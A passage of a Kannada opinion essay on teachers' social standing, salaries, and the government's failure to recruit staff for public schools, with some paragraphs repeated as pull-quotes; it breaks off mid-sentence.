ಸಮಾಜ ಸಮ್ಮುಖದಲ್ಲಿ ಶಿಕ್ಷಕರು

ಶಿಕ್ಷಣ ಅಂದರೆ ಹರಿಯುವ ನೀರು. ಶಿಕ್ಷಕನೆಂದರೆ ನೀರು ಹರಿದು ಬರುವ ಕೊಳವೆ. ಪಠ್ಯವೆಂದರೆ ಟ್ಯಾಂಕಿಯಲ್ಲಿ ತುಂಬಿರುವ ನಿಂತ ನೀರು. ಅದು ಕೊಳಕಾಗಿದ್ದರೆ ನಲ್ಲಿಯಲ್ಲಿ ಕೊಳಕು ನೀರೇ ಬರುತ್ತದೆ.ನಮ್ಮ ಟ್ಯಾಂಕಿಯಲ್ಲೇ ಕೊಳೆನೀರು ತುಂಬಿರುವಾಗ ಶಿಕ್ಷಕ ಅದನ್ನು ಹೇಗೆ ಸುಧಾರಿಸಿಯಾನು? ಶಿಕ್ಷಣ ಹೇಗೆ ಒಳ್ಳೆಯದಾದೀತು? ಶಿಕ್ಷಕರಿಗೆ ಹೇಗೆ ಗೌರವ ಸಿಕ್ಕೀತು?

ಶಿಕ್ಷಕರ ದಿನಾಚರಣೆಯೇ ಪ್ರಧಾನ ಹಬ್ಬವಾಗಿರುವ ಸೆಪ್ಟೆಂಬರ್ ತಿಂಗಳಲ್ಲಿ ಶಿಕ್ಷಣ ಮತ್ತು ಶಿಕ್ಷಕರ ಬಗ್ಗೆ ಚಿಂತನೆಗೆ ತೊಡಗುವುದು ಅರ್ಥಪೂರ್ಣ ಸಂಗತಿಯಾಗಿದೆ. ಆದರೆ ಶಿಕ್ಷಕರ ದಿನಾಚರಣೆಯನ್ನು ಆಚರಿಸುವ ಕ್ರಮಮಾತ್ರ ಅದರ ಧ್ಯೇಯಕ್ಕೆ ವಿರುದ್ಧವಾಗಿದೆ. ಅಂದು ಶಾಲೆಗಳಲ್ಲಿ ಶಿಕ್ಷಕರ ಗೌರವಾಚರಣೆಯನ್ನು ವಿದ್ಯಾರ್ಥಿಗಳೂ ಪೋಷಕರೂ ಸೇರಿ ಮಾಡಬೇಕು. ಆದರೆ ಆ ದಿನ ಶಾಲೆಗಳಿಗೆ ರಜೆ ನೀಡಿ ಶಿಕ್ಷಕರೆಲ್ಲಾ ತಾಲೂಕು ಕೇಂದ್ರದಲ್ಲಿ ಸಭೆ ಸೇರಿ ನಿವೃತ್ತ ಶಿಕ್ಷಕರಿಗೆ ಸನ್ಮಾನ, ಪ್ರಶಸ್ತಿ ವಿಜೇತರಿಗೆ ಸನ್ಮಾನ ಇತ್ಯಾದಿ ಕಾರ್ಯಕ್ರಗಳಲ್ಲಿ ಮುಳುಗಿಕೊಂಡು ಮುಖ್ಯ ಅತಿಥಿಗಳಿಂದ ‘ಶಿಕ್ಷಕರೆಂದರೆ ಮಕ್ಕಳ ಶಿಲ್ಪಿಗಳು’ ಎಂಬ ಭಾಷಣಗಳನ್ನು ಕೇಳಿಸಿಕೊಂಡು ಮನೆಗೆ ಮರಳುವಲ್ಲಿಗೆ ಶಿಕ್ಷಕ ದಿನಾಚರಣೆ ಮುಗಿಯುತ್ತದೆ. ಹೀಗೆ ನಡೆಯುವ ಒಂದು ದಿನದ ಸರಕಾರೀ ಕಾರ್ಯಕ್ರಮವು ಶಿಕ್ಷಕರನ್ನು ಸಮಾಜ ಗೌರವಿಸುತ್ತದೆ ಎನ್ನುವುದಕ್ಕೆ ಪುರಾವೆಯಾಗಲಾರದು.

‘ಕಲಿಯುತ್ತ ಕಲಿಸುವವನೇ ಗುರು’ ಎಂಬ ಕನಿಷ್ಟ ಮಾಪಕವನ್ನು ಇಟ್ಟುಕೊಂಡರೆ ಶಿಕ್ಷಕರಲ್ಲಿ ಎಷ್ಟು ಮಂದಿ ನಿಜವಾದ ಗುರುಗಳಿದ್ದಾರೆ ಎಂಬ ಪ್ರಶ್ನೆಗೆ ಬೇಸರ ಪಡುವಂತಹ ಉತ್ತರವೇ ಸಿಕ್ಕುತ್ತದೆ. ಸ್ವತಃ ತಾವೇ ಜ್ಞಾನದ ಒರತೆಯಾಗದೆ ಕೇವಲ ಮಾಹಿತಿ ವಿತರಣೆಗೆ ಸೀಮಿತವಾಗಿ ದುಡಿಯುವ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆಯೇ ದೊಡ್ಡದಿದೆ. ಸೃಜನಶೀಲ ಚಿಂತನೆಯ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ರೂಪಿಸಲಾಗದ ಇವರಾದರೂ ಇರುವ ಕಾರಣದಿಂದಾಗಿ ನಾವೀಗ ಶಿಕ್ಷಕರ ವೇತನ ಮತ್ತು ಗೌರವದ ಬಗ್ಗೆ ಮಾತಾಡಬೇಕಾಗಿದೆ. ಸ್ವಾತಂತ್ರ್ಯ ಬಂದ ಬಳಿಕ ಕಳೆದ ಎಪ್ಪತ್ತು ವರ್ಷಗಳಲ್ಲಿ ಗುಣಮಟ್ಟದ ಶಿಕ್ಷಣ ಅಂದರೆ ಅದು ಹೇಗಿರಬೇಕೆಂಬ ಕಾಳಜಿಯನ್ನೇ ವಹಿಸದ ನಮ್ಮ ದೇಶದ ಶಿಕ್ಷಣ ವ್ಯವಸ್ಥೆಯಲ್ಲಿ ‘ಕಲಿಯುತ್ತ ಕಲಿಸುವ ಗುರುಗಳು’ ರೂಪುಗುಳ್ಳುವುದು ಹೇಗೆ?

ಹಾಗೆ ಕಳೆದು ಉಳಿದವರು ಡಿ.ಎಡ್./ಬಿ.ಎಡ್. ಪದವಿ ಗಳಿಸಿ ಶಿಕ್ಷಕರಾಗುತ್ತಾರೆ. ಅವರೆಷ್ಟರ ಮಟ್ಟಿಗೆ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಪ್ರಭಾವಿಸಿ ಕಲಿಸಬಲ್ಲರು ಎಂಬ ಅನುಮಾನ ಇದ್ದೇ ಇದೆ.

ವಿದ್ಯಾರ್ಥಿಗಳಲ್ಲಿ ಭಯ ಹುಟ್ಟಿಸದೆ ಕಲಿಸುವವರು ಸಿದ್ಧಗೊಳ್ಳುವುದು ಹೇಗೆ? ಇಂತಹ ಗುರುಗಳು ತಮಗೆ ದೊರಕುವ ವೇತನವನ್ನು ಒಂದು ಸಮಸ್ಯೆ ಮಾಡಿಕೊಂಡು ಕೂರುವುದಿಲ್ಲ. ಹಾಗೆಂತ ಅವರಿಗೆ ಸಮಾಜದಿಂದ ಗೌರವ ಸಿಗದೆ ಉಳಿಯುವುದಿಲ್ಲ. ಹಾಗಾಗಿ ಶಿಕ್ಷಕರ ವೇತನ ಮತ್ತು ಗೌರವದ ಸಮಸ್ಯೆಗಳ ಬಗ್ಗೆ ನಡೆಸುವ ಚರ್ಚೆ ಸೃಜನಶೀಲ ಶಿಕ್ಷಣವೆಂಬ ಆಯಾಮದ ಹೊರಗಿನ ವಿಸ್ತಾರದಲ್ಲಿ ನಡೆಯಬೇಕಾಗುತ್ತದೆ.

ಇಂದು ಜ್ಞಾನವಂತರು ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಆಯ್ಕೆ ಮಾಡಿಕೊಳ್ಳುತ್ತಿಲ್ಲವೇಕೆ ಎಂಬ ಪ್ರಶ್ನೆ ಸಮಾಜದ ಮುಂದಿದೆ. ಉನ್ನತ ಅಂಕಗಳನ್ನು ಗಳಿಸಿ ಜಾಣರೆನ್ನಿಸಿದವರು ಡಾಕ್ಟರ್ ಅಥವಾ ಇಂಜಿನಿಯರ್ ವೃತ್ತಿಪರ ಶಿಕ್ಷಣವನ್ನು ಆಯ್ದುಕೊಳ್ಳುತ್ತಾರೆ. ಹಾಗೆ ಕಳೆದು ಉಳಿದವರು ಡಿ.ಎಡ್./ಬಿ.ಎಡ್. ಪದವಿ ಗಳಿಸಿ ಶಿಕ್ಷಕರಾಗುತ್ತಾರೆ. ಅವರೆಷ್ಟರ ಮಟ್ಟಿಗೆ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ಪ್ರಭಾವಿಸಿ ಕಲಿಸಬಲ್ಲರು ಎಂಬ ಅನುಮಾನ ಇದ್ದೇ ಇದೆ.

ಅಂದರೆ ಕಲಿಕೆಯ ಸ್ಫುರಣೆ ನೀಡಿ ಕಲಿಸಬಲ್ಲವರು ವೈದ್ಯಕೀಯ ಮತ್ತು ತಾಂತ್ರಿಕ ಕ್ಷೇತ್ರಗಳಲ್ಲಿ ಸೇರಿಕೊಳ್ಳುತ್ತಾರೆ. ಅಂದ ಬಳಿಕ ಮಕ್ಕಳಲ್ಲಿ ಇರುವ ಸೃಜನಶೀಲತೆಗೆ ಬೆಳಕು ಕೊಡುವವರು ಯಾರು? ಇದು ಇಡೀ ಸಮಾಜಕ್ಕೆ ನಷ್ಟವಲ್ಲವೇ? ಹಾಗಾಗಿ ಹೆಚ್ಚಿನ ವೇತನ ಮತ್ತು ಸವಲತ್ತುಗಳನ್ನು ನೀಡಿ ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನು ಆಕರ್ಷಕವಾಗಿಸಬಹುದೇ? ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ಅದೆಷ್ಟೋ ಕೋಟಿ ಶಿಕ್ಷಕರು ಬೇಕಾಗಿರುವಾಗ ಸಮರ್ಥ ವ್ಯಕ್ತಿಗಳನ್ನು ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಬರುವಂತೆ ಸೆಳೆಯಲು ವೇತನ ಮತ್ತು ಸವಲತ್ತುಗಳು ದಾಳಗಳಾಗಬಹುದೇ? ಇದು ಸಾರ್ವಜನಿಕ ಚರ್ಚೆಯಲ್ಲಿರುವ ಒಂದು ಪ್ರಶ್ನೆ. ಇದರ ವಿಶ್ಲೇಷಣೆಗಾಗಿ ನಾವೀಗ ಪ್ರಸ್ತುತ ಪರಿಸ್ಥಿತಿಯ ಅವಲೋಕನ ಮಾಡಬೇಕಾಗಿದೆ.

ಅದು ಶೈಕ್ಷಣಿಕ ಗುಣಮಟ್ಟದ ಮೇಲೆ ದುಷ್ಪರಿಣಾಮ ಬೀರುತ್ತದೆ. ಅತೃಪ್ತ ಹೆತ್ತವರು ಸರಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಇದ್ದ ಮಕ್ಕಳನ್ನು ಬೇರೆ ಖಾಸಗಿ ಶಾಲೆಗಳಿಗೆ ಸೇರಿಸುತ್ತಾರೆ. ಅಲ್ಲಿಯ ಶಿಕ್ಷಕರ ಗುಣಮಟ್ಟ ಹೇಗಿದೆ ಎಂತ ತಿಳಿದುಕೊಳ್ಳುವ ವ್ಯವಧಾನ ಅವರಿಗಿರುವುದಿಲ್ಲ. ಬದಲಾಗಿ ಸಾಕಷ್ಟು ಶಿಕ್ಷಕರಿದ್ದಾರಲ್ಲಾ ಎಂಬುದೊಂದೇ ಆಯ್ಕೆಯ ಮಾಪಕವಾಗಿ ಬಿಡುತ್ತದೆ.

ಎಲ್ಲಿ ಶಿಕ್ಷಕರಿಲ್ಲ ಎಂಬುದರ ಲೆಕ್ಕ ತೆಗೆದರೆ ಅದು ಕಂಡು ಬರುವುದು ಸರಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿಯೇ. ಖಾಸಗಿ ಅನುದಾನ ರಹಿತ ಶಾಲೆಗಳಲ್ಲಿ ಶಿಕ್ಷಕರು ಬೇಕಾದಷ್ಟಿದ್ದಾರೆ. ಅದೇ ಆ ಶಾಲೆಗಳ ಆಕರ್ಷಣೆ ಮತ್ತು ಶಕ್ತಿ ಕೂಡಾ ಆಗಿದೆ. ಹಾಗಿದ್ದರೆ ಶಿಕ್ಷಕರ ಹುದ್ದೆಗೆ ಅಭ್ಯರ್ಥಿಗಳು ಇಲ್ಲದೆ ಶಿಕ್ಷಕರ ಕೊರತೆ ಆಗಿರುವುದಲ್ಲ. ಅದು ಆಗಿರುವುದು ಸರಕಾರವೇ ನೇಮಕಾತಿ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಕೈಗೊಳ್ಳದಿರುವುದರಿಂದ. ಸರಕಾರವಾದರೂ ಯಾಕೆ ನೇಮಕಾತಿ ಮಾಡುತ್ತಿಲ್ಲವೆಂದರೆ 1:40 ಎಂಬ ಶಿಕ್ಷಕ ವಿದ್ಯಾರ್ಥಿಗಳ ದಾಮಾಶಯದ ನಿಯಮ ಅಡ್ಡ ಬರುತ್ತದೆ.

ಈ ನೀತಿಯಲ್ಲಿ ಒಂದು ದೋಷವಿದೆ. ಅದೇನೆಂದರೆ ನಿಗದಿಪಡಿಸಿದ ದಾಮಾಶಯವು ತರಗತಿವಾರು ಆಗಬೇಕಾಗಿದ್ದುದು ಶಾಲಾವಾರು ಆಗಿದೆ. ಹಾಗಾಗಿ ಶಾಲೆಗಳಲ್ಲಿ ವಿದ್ಯಾರ್ಥಿಗಳ ಸಂಖ್ಯೆ ಕಡಿಮೆ ಆದಾಗ ಹುದ್ದೆಗಳ ಸಂಖ್ಯೆ ಕಡಿಮೆಯಾಗಿ ಇದ್ದ ಶಿಕ್ಷಕರನ್ನೂ ಬೇರೆಡೆಗೆ ವರ್ಗ ಮಾಡುತ್ತಾರೆ. ಹೀಗಾಗಿ ಸರಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಶಿಕ್ಷಕರ ಕೊರತೆ ಕಾಡುತ್ತದೆ. ಅದು ಶೈಕ್ಷಣಿಕ ಗುಣಮಟ್ಟದ ಮೇಲೆ ದುಷ್ಪರಿಣಾಮ ಬೀರುತ್ತದೆ. ಅತೃಪ್ತ ಹೆತ್ತವರು ಸರಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಇದ್ದ ಮಕ್ಕಳನ್ನು ಬೇರೆ ಖಾಸಗಿ ಶಾಲೆಗಳಿಗೆ ಸೇರಿಸುತ್ತಾರೆ. ಅಲ್ಲಿಯ ಶಿಕ್ಷಕರ ಗುಣಮಟ್ಟ ಹೇಗಿದೆ ಎಂತ ತಿಳಿದುಕೊಳ್ಳುವ ವ್ಯವಧಾನ ಅವರಿಗಿರುವುದಿಲ್ಲ. ಬದಲಾಗಿ ಸಾಕಷ್ಟು ಶಿಕ್ಷಕರಿದ್ದಾರಲ್ಲಾ ಎಂಬುದೊಂದೇ ಆಯ್ಕೆಯ ಮಾಪಕವಾಗಿ ಬಿಡುತ್ತದೆ.

ಬಲ ಕಳೆದುಕೊಳ್ಳುತ್ತಿರುವ ಸರಕಾರಿ ಶಾಲೆಗಳಲ್ಲೂ ಒಂದು ಚೋದ್ಯ ನಡೆಯುತ್ತದೆ. ಅದೇನೆಂದರೆ ಇಲಾಖೆಯಿಂದ ಮತ್ತು ಶಾಲಾಭಿವೃದ್ಧಿ ಸಮಿತಿಗಳಿಂದ ಗೌರವ ಶಿಕ್ಷಕರ ನೇಮಕಾತಿ ಮಾಡುತ್ತಾರೆ. ಇದೆರಡೂ ಆಗದಿದ್ದಲ್ಲಿ ಸರಕಾರೀ ವೇತನ ಪಡೆಯುವ ಶಿಕ್ಷಕರೇ ವಂತಿಕೆ ಹಾಕಿ ಸ್ಥಳೀಯವಾಗಿ ಶಿಕ್ಷಕಿಯನ್ನು ಸೇರಿಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಇವರ ವೇತನ ಸುಮಾರು ರೂಪಾಯಿ 3000 ದಿಂದ ರೂಪಾಯಿ 6000 ತನಕ ಇರುತ್ತದೆ. ಇವರ ಶೈಕ್ಷಣಿಕ ಅರ್ಹತೆ ಮತ್ತು ಕಲಿಸುವ ಸಾಮರ್ಥ್ಯದ ಪ್ರಶ್ನೆ ಬರುವುದಿಲ್ಲ.

ಇನ್ನು 15-20 ಸಾವಿರ ಪಡೆಯುವವರ ಸಂಖ್ಯೆ ತೀರಾ ಅಪರೂಪ. ಮಹಾನಗರ ಪ್ರದೇಶಗಳ ಕೆಲ ಪ್ರತಿಷ್ಟಿತ ಶಾಲೆಗಳಲ್ಲಿ 20 ರಿಂದ 30 ಸಾವಿರ ರೇಂಜ್‍ನಲ್ಲಿ ವೇತನ ಪಡೆಯುವವರು ಇರಬಹುದು.

ಈ ವಾಸ್ತವಿಕ ಪರಿಸ್ಥಿತಿ ನಮಗೇನನ್ನು ಸೂಚಿಸುತ್ತದೆಂದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಬರುವವರಿಗೇನೂ ಕೊರತೆ ಇಲ್ಲ. ಹುದ್ದೆಗಳಲ್ಲಿರುವ ಶಿಕ್ಷಕರಿಗೂ ಅತಿಥಿ ಶಿಕ್ಷಕರಿಗೂ ವೇತನದಲ್ಲಿ ಅಜಗಜಾಂತರವಿದ್ದರೂ ಅದು ಒಂದು ಸಮಸ್ಯೆಯಾಗುವುದಿಲ್ಲ. ಇನ್ನು ಖಾಸಗಿ ಶಾಲೆಗಳ ಕತೆಯೂ ಇದೇ ಆಗಿದೆ. ಸಾಕಷ್ಟು ಡೊನೇಶನ್ ಪಡೆಯುವ ಇಂಗ್ಲಿಷ್ ಮಿಡಿಯಂ ಶಾಲೆಗಳ ಶಿಕ್ಷಕರಲ್ಲಿಯೂ ಸಂಬಳ ತಿಂಗಳಿಗೆ ರೂ 10,000 ಕ್ಕಿಂತ ಮೀರದವರೇ ಹೆಚ್ಚು. ಹತ್ತರಿಂದ ಹದಿನೈದು ಸಾವಿರ ಪಡೆಯುವವರು ಕೆಲವು ಮಂದಿ ಇರಬಹುದು. ಇನ್ನು 15-20 ಸಾವಿರ ಪಡೆಯುವವರ ಸಂಖ್ಯೆ ತೀರಾ ಅಪರೂಪ. ಮಹಾನಗರ ಪ್ರದೇಶಗಳ ಕೆಲ ಪ್ರತಿಷ್ಟಿತ ಶಾಲೆಗಳಲ್ಲಿ 20 ರಿಂದ 30 ಸಾವಿರ ರೇಂಜ್‍ನಲ್ಲಿ ವೇತನ ಪಡೆಯುವವರು ಇರಬಹುದು. ಹಾಗಾಗಿ ಹುದ್ದೆಗಳನ್ನು ತುಂಬಲು ನೇಮಕಾತಿ ಮಾಡಿಕೊಳ್ಳುವಿರಾದರೆ ಶಿಕ್ಷಕರಾಗಲು ಬರುವವರಿದ್ದಾರೆ. ಆದರೂ ನೇಮಕಾತಿಗಳನ್ನು ಸರಕಾರ ಮಾಡಿಕೊಳ್ಳುತ್ತಿಲ್ಲ ಯಾಕೆ?

ವಿವಿಧ ಬಗೆಯ ಶಿಕ್ಷಕರು

ಶಿಕ್ಷಕ ವೃತ್ತಿಯನ್ನೇ ಬಯಸಿ ಮಕ್ಕಳಲ್ಲಿ ಸೃಜನಶೀಲತೆ ತುಂಬುವ ಕ್ರಿಯಾಶೀಲ ಶಿಕ್ಷಕರು ಒಂದು ತುದಿಯಲ್ಲಿದ್ದರೆ ಇನ್ನೊಂದು ತುದಿಯಲ್ಲಿ ಏನೂ ಕೆಲಸ ಮಾಡದೆ ಸರಕಾರಿ ವೇತನ ಪಡೆಯುವ ಶಿಕ್ಷಕರಿದ್ದಾರೆ. ಪಠ್ಯ ಮುಗಿಸಿದಲ್ಲಿಗೆ ತಮ್ಮ ಹೊಣೆ ಮುಗಿಯಿತೆಂದು ತಿಳಿವವರು, ಮಕ್ಕಳಲ್ಲೇ ಓದಿಕೊಳ್ಳಲು ಹೇಳಿ ಪಾಠ ಮುಗಿಯಿತೆಂದು ಹೇಳುವವರು, ಏನೂ ತಿಳಿಯದ ಮಗುವಿನ ಹೆತ್ತವರಲ್ಲಿ ನಿಮ್ಮ ಮಗು ಹುಷಾರಿದ್ದಾನೆ ಎಂತ ಹೇಳಿ ಹಿಂದೆ ಕಳಿಸುವವರು, ಎರಡು ದಿನಗಳಿಗೊಮ್ಮೆ ಶಾಲೆಗೆ ಹೋಗಿ ಎಲ್ಲಾ ದಿನಗಳ ಹಾಜರಿ ಹಾಕುವವರು, ಶಿಕ್ಷಕರ ಸಂಘಟನೆ ಎನ್ನುತ್ತ ರಾಜಕಾರಣಿಗಳ ಹಿಂದೆ ತಿರುಗುವವರು ಹೀಗೆ ವಿವಿಧ ಬಗೆಯ ಶಿಕ್ಷಕರಿದ್ದಾರೆ.

ಯಾರನ್ನೂ ಫೇಲ್ ಮಾಡಬಾರದೆಂಬ ನಿಯಮವನ್ನೇ ಸೌಲಭ್ಯವಾಗಿಟ್ಟುಕೊಂಡು ಏನೂ ಕಲಿಸದಿದ್ದರೂ ನಡೆಯುತ್ತದೆ ಎಂಬ ವೃತ್ತಿ ನಿರ್ಲಕ್ಷ್ಯ ಮಾಡುವವರಿದ್ದಾರೆ. ಇನ್ನು ಕೆಲವರು ತರಗತಿಗಳಿಗೆ ಹೋಗಿ ತಮ್ಮ ವೈಯಕ್ತಿಕ ಕೆಲಸಗಳಲ್ಲಿ ತೊಡಗುವವರಿದ್ದಾರೆ. ಇಷ್ಟೊಂದು ವ್ಯಕ್ತಿತ್ವ ವೈವಿಧ್ಯಗಳಿರುವಾಗ ಶಿಕ್ಷಕರ ಮೇಲೆ ಸಮಾಜಕ್ಕಿರಬೇಕಾದ ಗೌರವವೂ ವೈವಿಧ್ಯಮಯವಾಗಿರುವುದಿಲ್ಲವೆ?

ಹಣಕಾಸಿನ ಲೆಕ್ಕಾಚಾರವೇ ಇದರ ಹಿಂದೆ ಇರುವ ಪ್ರಮುಖ ಕಾರಣ. ಶಿಕ್ಷಕರ ವೇತನವನ್ನು ಆಕರ್ಷಕವಾಗುವಂತೆ ಏರಿಸಿ ಆಗಿದೆ. ಎಸ್.ಎಸ್.ಎಲ್.ಸಿ. ಅಥವಾ ಪಿ.ಯು.ಸಿ. ಶಿಕ್ಷಣದ ಬಳಿಕ ಡಿ.ಎಡ್. ಕೋರ್ಸ್ ಮುಗಿಸಿದವರಿಗೆ ಸರಕಾರಿ ಶಾಲೆಗಳಲ್ಲಿ ಉದ್ಯೋಗ ದೊರೆತರೆ ಸಿಗುವ ಮೂಲ ವೇತನ ರೂ 25,800 ಹಾಗೂ ಅದಕ್ಕೆ ನಿಗದಿತ ಶೇಕಡಾ ಭತ್ಯೆ ಸೇರಿದಾಗ ಸುಮಾರು ರೂ 35,000 ಕ್ಕೂ ಹೆಚ್ಚಾಗುತ್ತದೆ. ಇದು ನಗರದ ಶಾಲೆಯಲ್ಲಾದರೂ ಹಳ್ಳಿಯ ಶಾಲೆಯಲ್ಲಾದರೂ ಸಿಗುತ್ತದೆ. ಇಂದು ಎಂಜಿನಿಯರಿಂಗ್ ಕಲಿತವರಿಗೆ ಬೆಂಗಳೂರಿನಂತಹ ನಗರಗಳಲ್ಲಿ ಇಷ್ಟು ವೇತನ ಸಿಗದಿರುವ ಪರಿಸ್ಥಿತಿ ಇದೆ.

ಇನ್ನು ಪದವಿ ಶಿಕ್ಷಣ ಪಡೆದು ಬಿ.ಎಡ್. ತರಬೇತಿ ಪಡೆದವರಿಗೆ ಸರಕಾರಿ ವೇತನ ತಿಂಗಳಿಗೆ ರೂ 40,000 ದಾಟುತ್ತದೆ. ಇನ್ನು ಪ್ರೌಢಶಾಲೆಯ ಶಿಕ್ಷಕರ ವೇತನವೂ ಆಕರ್ಷಕವಾಗಿದೆ. ಕಾಲೇಜು ಹಾಗೂ ವಿಶ್ವವಿದ್ಯಾಲಯಗಳ ಹಂತದಲ್ಲಿ ಪ್ರಾಧ್ಯಾಪಕರಿಗೆ ಇರುವ ಯು.ಜಿ.ಸಿ. ವೇತನ ತಿಂಗಳಿಗೆ ಲಕ್ಷ ರೂಪಾಯಿಗಳ ಅತ್ತ ಇತ್ತ ಇರುವುದರಿಂದ ಆತ್ಯಾಕರ್ಷಕವಾಗಿದೆ. ಆದರೆ ಸಮಸ್ಯೆ ಏನೆಂದರೆ ವೇತನ ಮತ್ತು ಸೌಲಭ್ಯಗಳ ಪ್ರಶ್ನೆಗಿಂತಲೂ ನೇಮಕಾತಿಯ ವಿಚಾರದಲ್ಲಿ ಸರಕಾರದ ನಿರ್ಲಕ್ಷ್ಯವೇ ಶಾಲೆಗಳಲ್ಲಿ ಶಿಕ್ಷಕರ ಕೊರತೆಗೆ ಕಾರಣ ಎನ್ನಬೇಕಾಗುತ್ತದೆ.

ಮಕ್ಕಳ ಶಿಕ್ಷಣ ಮುಗಿದ ಬಳಿಕವೂ ಮುಂದುವರಿಯುವ ಗೌರವ ಅದು. ತಮಗಾಗಿಯೂ ವಿದ್ಯಾರ್ಥಿಗಳಿಗಾಗಿಯೂ ದುಡಿಯುವ ಇಂತಹ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆ ಕಡಿಮೆ. ಆದರೆ ತಮಗಾಗಿಯೇ ದುಡಿಯುವ ಶಿಕ್ಷಕರೂ ಗೌರವ ಪಡೆಯುತ್ತಾರೆ. ಅದು ಹೇಗೆಂದರೆ ಅವರು ವಿದ್ಯಾರ್ಥಿಗಳಲ್ಲಿ ಭಯವನ್ನು ಹುಟ್ಟಿಸಿ ಬಿಡುತ್ತಾರೆ. ಅಥವಾ ಓಲೈಕೆಯ ಉಪಾಯ ಮಾಡುತ್ತಾರೆ.

ಈಗಿನ ದಿನಗಳಲ್ಲಿ ಅತಿಥಿ ಶಿಕ್ಷಕರ ನೇಮಕಾತಿಯ ಮೂಲಕ ಶಾಲೆ ಕಾಲೇಜುಗಳಷ್ಟೇ ಅಲ್ಲ, ವಿಶ್ವವಿದ್ಯಾಲಯಗಳನ್ನು ಕೂಡಾ ನಡೆಸುತ್ತಿರುವ ದುರದೃಷ್ಟ ಕಾಡುತ್ತಿದೆ. ಹೀಗೆ ಅತಿಥಿಗಳಾಗಿ ಸಿಕ್ಕುವವರಿಗೆ ತಾತ್ಕಾಲಿಕ ನಿರುದ್ಯೋಗ ನಿವಾರಣೆ ಆಗುತ್ತದೆ. ಕಲಿಸುವ ಸಾಮರ್ಥ್ಯ ಹಾಗೂ ಒಲವು ಇಲ್ಲದವರೂ ಈ ಜಾಗಗಳಲ್ಲಿ ಇರುತ್ತಾರೆ. ಖಾಯಂ ನೌಕರರಿಗಿಂತ ಅತಿ ಕಡಿಮೆ ವೇತನ ಪಡೆಯುವ ಇವರು ಗೌರವದ ವಿಚಾರದಲ್ಲಿ ನಿಜಕ್ಕೂ ಸಂಕಟ ಪಡುವವರಾಗಿದ್ದಾರೆ. ನೇಮಕಾತಿಯ ಆಮೆನಡಿಗೆಯ ಹಿಂದೆ ಶಿಕ್ಷಕರ ನೇಮಕಾತಿಯು ನಷ್ಟದ ಬಾಬತ್ತೆಂಬ ತೀರ್ಮಾನವಿದೆ. ಹಾಗಾಗಿ ಸರಕಾರ ನ್ಯಾಯೋಚಿತವಾದ ನೀತಿಯನ್ನು ಅನ್ವಯಿಸಿದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಜನ ಬರುತ್ತಿಲ್ಲವೆಂಬ ಪ್ರಶ್ನೆ ಉಳಿಯುವುದಿಲ್ಲ.

ನಮ್ಮ ಸಮಾಜ ಶಿಕ್ಷಕರನ್ನು ಗೌರವಿಸದೆ ಏಕೆ ಕಡೆಗಣಿಸುತ್ತದೆ ಎಂಬ ಪ್ರಶ್ನೆ ತುಂಬಾ ಸೂಕ್ಷ್ಮವಾದುದು. ಇದು ಶಿಕ್ಷಕರ ಗುಣಾವಗುಣಗಳನ್ನು ಅವಲಂಬಿಸಿದೆ. ವೃತ್ತಿಪರತೆಯಿಂದ ಉದ್ಯೋಗವನ್ನು ಇಷ್ಟಪಟ್ಟು ಕಲಿಸುವ ಶಿಕ್ಷಕರು ವಿದ್ಯಾರ್ಥಿಗಳಲ್ಲಿ ಭಯ ಹುಟ್ಟಿಸುವುದಿಲ್ಲ. ಪ್ರೀತಿಯಿಂದ ಹೇಳಿಕೊಡುತ್ತಾರೆ. ಅವರನ್ನು ವಿದ್ಯಾರ್ಥಿಗಳು ಯಾವತ್ತೂ ಗೌರವಿಸುತ್ತಾರೆ. ಅವರ ಹೆತ್ತವರೂ ಗೌರವಿಸುತ್ತಾರೆ. ಇಲ್ಲಿ ಗೌರವಿಸುವುದೆಂದರೆ ತರಕಾರಿ, ಹಣ್ಣುಹಂಪಲು, ನಗದು ಹಣ ಇತ್ಯಾದಿ ಕೊಡುವುದಲ್ಲ. ಭಾವನಾತ್ಮಕವಾಗಿ ಶಿಕ್ಷಕರ ಬಗ್ಗೆ ಗೌರವ ಹೊಂದಿರುತ್ತಾರೆ. ಮಕ್ಕಳ ಶಿಕ್ಷಣ ಮುಗಿದ ಬಳಿಕವೂ ಮುಂದುವರಿಯುವ ಗೌರವ ಅದು. ತಮಗಾಗಿಯೂ ವಿದ್ಯಾರ್ಥಿಗಳಿಗಾಗಿಯೂ ದುಡಿಯುವ ಇಂತಹ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆ ಕಡಿಮೆ. ಆದರೆ ತಮಗಾಗಿಯೇ ದುಡಿಯುವ ಶಿಕ್ಷಕರೂ ಗೌರವ ಪಡೆಯುತ್ತಾರೆ. ಅದು ಹೇಗೆಂದರೆ ಅವರು ವಿದ್ಯಾರ್ಥಿಗಳಲ್ಲಿ ಭಯವನ್ನು ಹುಟ್ಟಿಸಿ ಬಿಡುತ್ತಾರೆ. ಅಥವಾ ಓಲೈಕೆಯ ಉಪಾಯ ಮಾಡುತ್ತಾರೆ. ಅದಕ್ಕಾಗಿ ಪರೀಕ್ಷೆ ಮತ್ತು ಅಂಕಗಳನ್ನು ದಾಳವಾಗಿ ಬಳಸಿಕೊಳ್ಳುತ್ತಾರೆ. ಆದರೆ ಇಂತಹವರ ಬಗ್ಗೆ ಮಕ್ಕಳಿಗೆ ಗೌರವ ಇರುವುದು ತಮ್ಮ ಶಿಕ್ಷಣ ಮುಗಿಯುವಲ್ಲಿಯವರೆಗೆ ಮಾತ್ರ. ಏಕೆಂದರೆ ಆಮೇಲೆ ಭಯ ಉಳಿಯುವುದಿಲ್ಲ, 